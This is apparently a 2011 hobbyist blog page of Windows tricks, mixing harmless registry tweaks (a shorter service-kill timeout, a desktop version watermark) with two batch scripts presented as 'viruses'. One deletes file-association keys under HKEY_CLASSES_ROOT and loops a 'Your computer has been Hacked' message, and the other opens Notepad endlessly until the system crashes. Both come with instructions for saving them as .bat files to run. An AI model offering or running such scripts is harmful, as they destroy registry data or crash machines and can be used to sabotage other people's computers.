Sunday, 15 May 2011

Registry Virus

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)
(save this file with the name of RegistryVirus.bat)

@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 :MESSAGE
 ECHO Your computer has been Hacked.  Have a nice day.
 GOTO MESSAGE

FASTER SHUTDOWN

When a user shuts down Windows XP, first the system has to kill all services
currently running. Every once in a while the service does not shut down
instantly and windows gives it a change to shut down on its own before it kills it.
This amount of time that windows waits is stored in the system registry.
If you modify this setting, then windows will kill the service earlier. To modify
the setting, follow the directions below:
Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000(200 would be good)

Tuesday, 3 May 2011

STOPLESS NOTEPAD VIRUS

-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Just Paste The Below Command In Notepad And save It as the name of Notepadvirus.bat (note:You Must Type  .bat in the end of the file name.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Sunday, 24 April 2011

SEE YOUR WINDOWS VERSION ON YOUR DESKTOP

Using The Following Steps You can See Your Windows Version On your Desktop:
1. Goto Start –> Run (Windows Key + R)
2. Type Regedit and hit Enter.
3. In Registry editor, navigate to this key:
HKEY_CURRENT_USER\Control Panel\Desktop
4. Select “Desktop” in left pane and search for “PaintDesktopVersion” in right pane and double-click it.5. A dialog will pop-up, change the “Value Data” field from 0 to 1.6. Restart the Windows you will find Windows version printed on the desktop.
Check Windows version on the desktop in the lower right-hand corner.
Note:
If you wish to remove the watermark, just change the “Value Data” field back to 0.

Discussion Board

Followers